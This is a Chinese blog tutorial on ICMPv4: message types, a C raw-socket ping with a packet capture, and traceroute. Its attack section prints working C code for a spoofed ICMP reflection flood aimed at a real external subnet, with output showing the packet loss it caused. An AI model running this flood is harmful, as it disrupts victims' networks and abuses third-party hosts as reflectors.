5.ICMPv4协议分析与实践

最新推荐文章于 2024-03-25 21:53:15 发布
最新推荐文章于 2024-03-25 21:53:15 发布
阅读量1.3k 收藏 5
点赞数 2
分类专栏: 网络协议 Linux 文章标签: 网络 icmp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhishenluo/article/details/103728672
版权

ICMPv4 协议分析与实践

1. 概述

1.1 ICMP 简介

  • ICMP(Internet Control Message Protocol) : 用于 IP 中发送控制消息(不可靠),提供可能发生在通信环境中的各种问题反馈,通常用于返回的错误信息或是分析路由。
  • 依靠 IP 完成任务,但一般不用于在两点之间传输数据,通常不由网络程序直接使用,除了 ping 和 traceroute

1.2 ICMPv4 报文格式

在这里插入图片描述

类型说明代码
3目的不可达消息0 网络不可达
1 主机不可达
2 协议不可达
3 端口不可达
4 需要分片,但是设置了 DF
5 源路由失败
5重定向消息0 对网络重定向
1 对主机重定向
2 对服务类型和网络重定向
3 对服务类型和主机重定向
8/0ping 请求和 ping 应答
11超时消息0 传输超时,即 TTL 为 0(tracetoute 原理)
1 分片重组超时,重组定时器超时了,还有分片没到达
12参数问题消息0 IP 首部有问题,包括各种差错
1 缺少必需的选项(已废弃)
2 长度错误,总长度无效

1.3 不会产生 ICMPv4 报文的情况

  • 源地址不是单个主机的数据报,即零地址、回环地址、广播地址或组播地址
  • 目的地址是 IPv4 广播或组播地址
  • ICMPv4 差错报文
  • 不是第一个分片的其他分片
  • 作为链路层广播的数据报

2. ICMPv4 编程

2.1 ping

  • 通过计算 ICMP 的 echo 请求和 echo 应答报文的成功率和往返时间, 从而得到丢包率和网络时延
shell> cat icmp.h
#ifndef __icmp_h_
#define __icmp_h_

#define ICMP_ECHOREPLY      0   /* Echo Reply           */
#define ICMP_DEST_UNREACH   3   /* Destination Unreachable  */
#define ICMP_SOURCE_QUENCH  4   /* Source Quench        */
#define ICMP_REDIRECT       5   /* Redirect (change route)  */
#define ICMP_ECHO           8   /* Echo Request         */
#define ICMP_TIME_EXCEEDED  11  /* Time Exceeded        */
#define ICMP_PARAMETERPROB  12  /* Parameter Problem        */
#define ICMP_TIMESTAMP      13  /* Timestamp Request        */
#define ICMP_TIMESTAMPREPLY 14  /* Timestamp Reply      */
#define ICMP_INFO_REQUEST   15  /* Information Request      */
#define ICMP_INFO_REPLY     16  /* Information Reply        */
#define ICMP_ADDRESS        17  /* Address Mask Request     */
#define ICMP_ADDRESSREPLY   18  /* Address Mask Reply       */
#define NR_ICMP_TYPES       18

/* Codes for UNREACH. */
#define ICMP_NET_UNREACH    0   /* Network Unreachable      */
#define ICMP_HOST_UNREACH   1   /* Host Unreachable     */
#define ICMP_PROT_UNREACH   2   /* Protocol Unreachable     */
#define ICMP_PORT_UNREACH   3   /* Port Unreachable     */
#define ICMP_FRAG_NEEDED    4   /* Fragmentation Needed/DF set  */
#define ICMP_SR_FAILED      5   /* Source Route failed      */
#define ICMP_NET_UNKNOWN    6
#define ICMP_HOST_UNKNOWN   7
#define ICMP_HOST_ISOLATED  8
#define ICMP_NET_ANO        9
#define ICMP_HOST_ANO       10
#define ICMP_NET_UNR_TOS    11
#define ICMP_HOST_UNR_TOS   12
#define ICMP_PKT_FILTERED   13  /* Packet filtered */
#define ICMP_PREC_VIOLATION 14  /* Precedence violation */
#define ICMP_PREC_CUTOFF    15  /* Precedence cut off */
#define NR_ICMP_UNREACH     15  /* instead of hardcoding immediate value */

/* Codes for REDIRECT. */
#define ICMP_REDIR_NET      0   /* Redirect Net         */
#define ICMP_REDIR_HOST     1   /* Redirect Host        */
#define ICMP_REDIR_NETTOS   2   /* Redirect Net for TOS     */
#define ICMP_REDIR_HOSTTOS  3   /* Redirect Host for TOS    */

/* Codes for TIME_EXCEEDED. */
#define ICMP_EXC_TTL        0   /* TTL count exceeded       */
#define ICMP_EXC_FRAGTIME   1   /* Fragment Reass time exceeded */


struct icmphdr {
	unsigned char  type;
	unsigned char  code;
	unsigned short checksum;
	union {
		struct {
			unsigned short id; 
			unsigned short seq;
		} echo; 
		unsigned int gateway;
		struct {
			unsigned short unused;
			unsigned short mtu;
		} frag;
		unsigned char reserved[4];
	} un; 
};


struct icmphdr* icmp_alloc_echo_datagram(unsigned short id, unsigned seq);

void icmp_free_datagram(struct icmphdr **icmp);

void icmp_print_echo(const struct icmphdr *icmp);


int icmp_socket();

ssize_t icmp_send(int sockfd, struct icmphdr *icmp, size_t size, 
		const char *daddr, int flags);

ssize_t icmp_recv(int sockfd, void *buf, size_t size, 
		const char *daddr, int flags);

void icmp_close(int sockfd);

#endif /* __icmp_h_ */

shell> cat icmp.c
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#include "icmp.h"
#include "cksum.h"
#include "common.h"

struct icmphdr* icmp_alloc_echo_datagram(unsigned short id, unsigned seq)
{
	struct icmphdr *icmp;
	icmp = (struct icmphdr *) calloc(1, sizeof(struct icmphdr));
	icmp->type        = ICMP_ECHO;
	icmp->code        = 0;
	icmp->un.echo.id  = htons(id);
	icmp->un.echo.seq = htons(seq);

	// 如果带有数据,要连同数据一起计算校验和
	icmp->checksum = 0;          // 确保检验和为 0
	icmp->checksum = cksum((uint16_t *) icmp, sizeof(struct icmphdr)); 
	return icmp;
}

void icmp_free_datagram(struct icmphdr **icmp)
{
	if (NULL != icmp && NULL != *icmp) {
		free(*icmp);
		*icmp = NULL;
	}
}

void icmp_print_echo(const struct icmphdr *icmp) 
{
	printf("%02x\n", icmp->type);
	printf("%02x\n", icmp->code);
	printf("%04x\n", icmp->checksum);
	printf("%04x\n", ntohs(icmp->un.echo.id));
	printf("%04x\n", ntohs(icmp->un.echo.seq));
}

int icmp_socket() 
{
	int sockfd, size;

	if ((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) 
		handle_error("socket");

	// 增大接收缓冲区, 防止 ping 广播地址时溢出
	size = 128 * 1024;
	if (setsockopt(sockfd, SOL_SOCKET, SO_RCVBUF, &size, sizeof(size)))
		handle_error("setsockopt : SO_RCVBUF");

	return sockfd;
}

ssize_t icmp_send(int sockfd, struct icmphdr *icmp, size_t size, 
		const char *daddr, int flags) 
{
	ssize_t count;
	struct sockaddr_in addr;

	memset(&addr, 0, sizeof(addr));
	addr.sin_family = AF_INET;
	inet_pton(addr.sin_family, daddr, &addr.sin_addr);
	
	if ((count = sendto(sockfd, icmp, size, flags, (struct sockaddr *)&addr, sizeof(addr))) == -1)
		handle_error("sendto");
	return count;
}

ssize_t icmp_recv(int sockfd, void *buf, size_t size, 
		const char *daddr, int flags) 
{
	ssize_t count;
	socklen_t socklen;	
	struct sockaddr_in addr;

	memset(&addr, 0, sizeof(addr));
	addr.sin_family = AF_INET;
	inet_pton(addr.sin_family, daddr, &addr.sin_addr);

	socklen = sizeof(addr);
	
	if ((count = recvfrom(sockfd, buf, size, flags, (struct sockaddr *)&addr, &socklen)) == -1)
		handle_error("recvfrom");
	return count;
}

void icmp_close(int sockfd) 
{
	if (close(sockfd) == -1)
		handle_error("close");
}

shell> cat main.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include "ipv4.h"
#include "icmp.h"

#define BUFFER_SIZE 1500

static void icmp_ping(const char *addr) 
{
	int sockfd;
	struct icmphdr *icmp;
	struct ipv4_hdr *ipv4;
	char buffer[BUFFER_SIZE];

	sockfd = icmp_socket();

	// 发送消息
	icmp = icmp_alloc_echo_datagram(0x0001, 0x0009);
	icmp_send(sockfd, icmp, sizeof(struct icmphdr), addr, 0);
	icmp_free_datagram(&icmp);

	// 接收消息
	memset(buffer, 0, BUFFER_SIZE);
	icmp_recv(sockfd, buffer, BUFFER_SIZE, addr, 0);

	// 解析消息
	ipv4 = (struct ipv4_hdr *) buffer;	
	icmp = (struct icmphdr *) (buffer + ipv4->ihl * 4);
	icmp_print_echo(icmp);

	icmp_close(sockfd);	
}

int main(int argc, char *argv[])
{
	icmp_ping("192.168.2.200");
	return 0;
}

192.168.2.200 > sudo tcpdump -nt -XX icmp
IP 192.168.2.100 > 192.168.2.200: ICMP echo request, id 1, seq 9, length 8
	0x0000:  000d 0d0d 0d0d 000c 0c0c 0c0c 0800 4500  ..............E.
	0x0010:  001c 0c33 4000 4001 a831 c0a8 0264 c0a8  ...3@.@..1...d..
	0x0020:  02c8 0800 f7f5 0001 0009 0000 0000 0000  ................
	0x0030:  0000 0000 0000 0000 0000 0000            ............
IP 192.168.2.200 > 192.168.2.100: ICMP echo reply, id 1, seq 9, length 8
	0x0000:  000c 0c0c 0c0c 000d 0d0d 0d0d 0800 4500  ..............E.
	0x0010:  001c acd0 0000 4001 4794 c0a8 02c8 c0a8  ......@.G.......
	0x0020:  0264 0000 fff5 0001 0009                 .d........

192.168.2.100 > make run

2.2 traceroute

  • 当 TTL 为 0 时,路由器会丢弃该数据包,不再转发,并发送一个超时 ICMP 报文给源主机,通过不断累加 TTL,从而逐步确定下一跳路由器
  • 当 UDP 数据报到达最终目的地时,返回一个 ICMP 端口不可达错误,这个端口是随机的,如果目的主机使用了怎么办?

3. ICMPv4 攻防

3.1 ICMP 洪水攻击(ddos)

  • 通过伪装成目标机向外发送大量 ICMP echo 请求,导致目标机收到大量的 ICMP echo reply,造成网络故障
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include "ipv4.h"
#include "icmp.h"

static void icmp_ddos(const char *netsegment, const char *target)
{
	int sockfd;
	unsigned int num = 0;
	struct icmphdr *icmp;
	struct ipv4_hdr *ipv4;
	unsigned short tot_len;

	sockfd = ipv4_socket();
	tot_len = sizeof(struct ipv4_hdr) + sizeof(struct icmphdr);

	// 伪装成目标机对外发送 ICMP echo 消息
	icmp = icmp_alloc_echo_datagram(0x0001, 0x0009);
	ipv4 = ipv4_alloc_packet(tot_len, 0x0001, IP_PROTO_ICMP, target, netsegment, icmp, sizeof(struct icmphdr));

	// 循环给网段内所有机器发送
	while (++num) {
		ipv4->daddr = (ipv4->daddr & 0x00FFFFFF) | (num % 255 << 24);
		ipv4_send(sockfd, ipv4, tot_len, netsegment, 0);
		printf("%d\n", ipv4->daddr >> 24);
	}	

	icmp_free_datagram(&icmp);
	ipv4_free_packet(&ipv4);
	icmp_close(sockfd);	
}

int main(int argc, char *argv[])
{
	// 通过外网 39.156.69.0 网段攻击目标机
	icmp_ddos("39.156.69.79", "192.168.2.200");
	return 0;
}

192.168.2.200 > ping baidu.com
PING baidu.com (220.181.38.148) 56(84) bytes of data.
64 bytes from 220.181.38.148 (220.181.38.148): icmp_seq=1 ttl=127 time=36.6 ms
64 bytes from 220.181.38.148 (220.181.38.148): icmp_seq=2 ttl=127 time=36.4 ms
^C
--- baidu.com ping statistics ---
7 packets transmitted, 2 received, 71% packet loss, time 6085ms  # 出现大量丢包
rtt min/avg/max/mdev = 36.412/36.507/36.603/0.213 ms

192.168.2.100 > make run

3.2 ICMP 分片攻击(待补充)

参考链接

https://tools.ietf.org/html/rfc792

https://en.wikipedia.org/wiki/Internet_Control_Message_Protocol

https://www.cnblogs.com/skyfsm/p/6395953.html

百里奔跑
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
IEEE-IPv4-ICMPv4-ARP协议
01-24
ipv4,IEEE-IPv4-ICMPv4-ARP协议
ICMPICMPv4)概述
weixin_34174322的博客
01-05 1439
IP的设计目的是为了在设备之间将传送数据包,设计相对简单。而ICMP就是以辅助IP为目的进行设计的。初始研发ICMP是为了与IPv4进行配套使用的。而IPv6的出现,又设计了ICMPv6。 IP在除了传送数据包之外,也常常需要共享具体的信息以指导设备的运行,并需要执行测试和诊断。但是,IP本身并不支持设备进行低层控制报文的交换,这些特性是通...
什么是ICMPv4协议?
weixin_34109408的博客
06-13 2476
Internet Control Message Protocol (ICMP) 是Internet Protocol Suite的核心协议之一. 网络上的操作系统使用这个协议来发送错误信息来说明一些东西, 比如说, 被请求的服务不可用, 或者主机或路由不能被reach到. ICMP还可以被用来转播query messages.   ICMP跟TCP和UDP这样的传输协议不同, 它并不是被设计...
ICMP(IPv4) 是什么协议
keyboard专栏
03-04 454
它是TCP/IP协议族的一个核心协议,用于在IP主机、路由器之间传递控制消息。ICMP是一种用于IP主机或路由器向另一台IP主机或路由器报告错误消息和其他需要注意的信息的机制。ICMP使用IP协议的服务,属于网络层的协议。命令来测试与另一台计算机的连通性时,你实际上是在发送ICMP回显请求消息,并等待接收ICMP回显应答消息。指的是所有类型的ICMP消息都使用IPv4协议进行传输。ICMP网络故障诊断、网络设备(如路由器)的错误报告、网络可达性测试等都非常重要。
IPv4协议ICMPv4协议实验报告
愿历尽千帆,归来仍少年
06-01 639
IPv4与IPCMv4协议分析与实验报告
TCP/IP协议栈之LwIP(四)---网络诊断与状态查询(ICMPv4 + ICMPv6)
流云
07-22 6682
一、ICMP协议简介 架构IP网络时需要特别注意两点:确认网络是否正常工作;遇到异常时进行问题诊断。例如,一个刚刚搭建好的网络,需要验证该网络的设置是否正确,为了确保网络能够按照预期正常工作,一旦遇到什么问题需要立即制止问题的蔓延。IP协议虽然完成了数据报在各个主机之间的递交,但它只提供了一种无连接不可靠的数据报交付服务,协议本身并不提供任何错误检验与恢复机制,这就需要另一种协议ICMP(Inte...
ICMPICMPv4
weixin_33935505的博客
01-05 681
ICMP是TCP/IP中最简单的协议之一。它是一种定义制报文的协议,所以的ALCE基本上算是提供一种机制,借助该机制IP设备都可向另一设备发送控制报文。 ICMP的报文可以分为两类:错误性报文和信息性报文。 错误性报文:这类报文用于向源设备反馈所发生的错误信息。报文的产生通常都是对某种动作的具体响应,而这种动作又一般是数据报的传输,错误报...
ICMPv4
fang_lan的博客
10-21 650
IMCP主要用作发送有关网络层(L3)错误和控制消息的机制,让你能够通过发送ICMP消息来获取有关通信环境重问题的反馈。这些消息提供了错误处理和诊断功能。
在vb中使用Iphlpapi.dll获取网络信息 第二章 第七节 获取本机网间控制报文协议ICMP)信息
UruseiBest 的技术专栏
12-20 1269
※==================================================================※本连载文章说明:※1、连载首发于《软件报》(http://www.sweek.com)2006年21期(2006年5月22日);※2、此次网上连载采用的是原稿件结构,内容与《软件报》发表略有不同;※3、谢绝除《软件报》及其相关刊物之外的传统媒体部分或全部转载;※4
Netstat用于显示与IP、TCP、UDP和ICMP协议相关的统计数据,一般用于检验本机各端口的网络连接情况...
08-11 1924
如果你的计算机有时候接收到的数据报导致出错数据或故障,你不必感到奇怪,TCP/IP可以容许这些类型的错误,并能够自动重发数据报。但如果累计的出错情况数目占到所接收的IP数据报相当大的百分比,或者它的数目正迅速增加,那么你就应该使用Netstat查一查为什么会出现这些情况了。 Netstat 详细参数列表 (Winxp) C:\>netstat /? 显示协议统计信息和当前 ...
互联网协议ICMP 互联网控制消息协议
烟云的计算
06-01 3183
目录 文章目录目录ICMPICMPv4 协议ICMPv4 的消息类型Echo Request & Echo Reply MsgDestination Unreachable MsgParameter Problem MsgRedirect MsgTime Exceeded MsgTimestamp Request & Timestamp Reply MsgICMP 的应用pingtraceroute ICMP IPv4/v6 协议是尽力传输的网络协议,提供的数据传输服务是不可靠的、无连接
ICMPv4_TYPE_05:丢弃存在头部参数问题的报文
qq_27718973的博客
03-25 184
本测试旨在确保当DUT在处理数据报时发现头部参数问题,导致无法完成处理,DUT能够根据RFC 792的规定丢弃该数据报。特别注意,此测试在DUT支持IP选项(验证当数据报的头部参数存在问题时,设备(DUT)是否能够正确丢弃该数据报。3. 被测设备(DUT):丢弃ICMP回显请求,并且不发送ICMP回显应答。被测设备(DUT):丢弃ICMP回显请求,并且不发送ICMP回显应答。为TRUE)的情况下进行。测试仪(TESTER):向。测试仪(TESTER):在。
ICMPv6协议、DHCPv6协议pcap数据包下载;ICMPv6协议、DHCPv6协议报文解析
03-24
ICMPv6协议、DHCPv6协议pcap数据包下载,支持抓包软件(如:wireshark)打开并学习ICMPv6协议、DHCPv6协议报文解析。需要其他协议,请查看我发布的其他资源。
IPv6技术课件:ICMPv6协议.pdf
02-01
IPv6技术课件:ICMPv6协议.pdf
icmpv6.rar_icmpv6
09-23
Xorg driver exported structures.
美河制作.六个月成为网络专家.IP新技术.ICMPv6
10-01
美河制作.六个月成为网络专家.IP新技术.ICMPv6,多年的收藏了。
Linux内核之ICMPv4
m0_74282605的博客
03-02 405
icmp_sk_init函数为调用inet_ctl_sock_create每个CPU简历一个套接字,传输内核产生的ICMP消息。当路由程序无法传送入口IP报文时,会产ICMP_HOST_UNREACH消息或者当报文目的不是最佳路径时,产生ICMP_REDIRECT消息。当接收到的类型是ICMP_DEST_UNREACH代码为ICMP_FRAG_NEEDED时,如果PMTU发现功能开启内核需要更新路由缓存,否则只会记录警告记录。handler是由icmp_rcv调用的函数,用于处理具体的ICMP报文。
第八章ICMPv4ICMPv6 Internet控制报文协议
不积跬步无以至千里
08-29 7233
引言: ICMP负责传递可能需要主义的差错和控制报文 鉴于ICMP能够影响重要的系统功能操作和获取配置信息,黑客们已经在大量攻击中使用ICMP报文,由于担心这种攻击,网络管理员经常会用防火墙封阻ICMP报文,会导致大量的诊断程序将无法正常工作 ICMPv6不仅可以用于错误报告,还可以用于邻居发现ND,与ARP有相同的作用,还能配置主机和管理组播地址的路由器发现RD功能 在IPv4和...
《TCP IP 详解卷1:协议》阅读笔记 - 第八章
weixin_34034670的博客
01-14 202
阅读须知:笔记为阅读《TCP IP 详解卷1:协议》后摘抄的一些知识点,其间也有加入一些根据英文原版的自己翻译和结合网上知识后的理解,所以有些段落之间并不能够串联上或者知识点与书上略有差别(基本差别不大,参考的资料属RFC官方文档)。 第八章:ICMPv4ICMPv6: Internet控制报文协议 ICMP是一种面向无连接的协议,负责传递可能需要...
ICMPV6协议知识点
最新发布
04-22
ICMPv6(Internet Control Message Protocol version...5. ICMPv6与IPv4的区别:ICMPv6在功能上与IPv4中的ICMP类似,但在协议结构和消息格式上有所不同。IPv6中的ICMPv6更加灵活和扩展性强,引入了新的消息类型和选项。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值